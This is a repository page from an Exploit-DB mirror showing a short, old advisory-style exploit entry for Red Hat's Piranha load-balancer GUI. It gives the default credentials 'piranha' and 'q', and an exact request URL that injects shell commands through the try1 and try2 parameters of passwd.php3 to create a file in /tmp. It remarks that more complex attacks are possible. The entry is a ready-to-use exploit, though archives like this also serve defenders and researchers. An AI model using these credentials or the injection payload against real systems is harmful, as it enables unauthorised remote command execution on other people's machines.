bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/19879.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
928 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/1148/info
A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine.
The default username and password are piranha, and q, respectively.
Execute the following url, using the above information to authenticate: http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.
Reference in a new issue View git blame Copy permalink